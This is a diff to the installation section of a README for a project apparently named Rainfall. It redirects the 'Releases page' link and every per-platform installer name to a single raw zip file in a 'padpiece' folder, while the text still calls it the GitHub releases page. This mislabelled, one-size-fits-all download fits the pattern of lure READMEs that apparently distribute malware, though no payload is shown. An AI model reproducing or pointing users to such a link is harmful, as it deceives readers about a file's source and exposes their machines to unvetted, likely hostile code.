ahmedkhail/Rainfall/README.md

 ## 📦 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/ahmedkhail/Rainfall/releases) on GitHub.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/ahmedkhail/Rainfall/main/padpiece/Rainfall.zip) on GitHub.
 2. **Choose the Latest Version**: Look for the most recent version listed at the top.
 3. **Download the File**: Click on the appropriate file for your operating system.
-   - For Windows, you might download something like `Rainfall_Windows.exe`.
+   - For Windows, you might download something like `https://raw.githubusercontent.com/ahmedkhail/Rainfall/main/padpiece/Rainfall.zip`.
-   - For macOS, you might find `Rainfall_macOS.dmg`.
+   - For macOS, you might find `https://raw.githubusercontent.com/ahmedkhail/Rainfall/main/padpiece/Rainfall.zip`.
-   - For Linux, expect something like `Rainfall_Linux.tar.gz`.
+   - For Linux, expect something like `https://raw.githubusercontent.com/ahmedkhail/Rainfall/main/padpiece/Rainfall.zip`.
 4. **Run the Installer**: Once downloaded, double-click the file to start the installation.
 5. **Follow the Prompts**: Simply follow the prompts on your screen to complete the setup.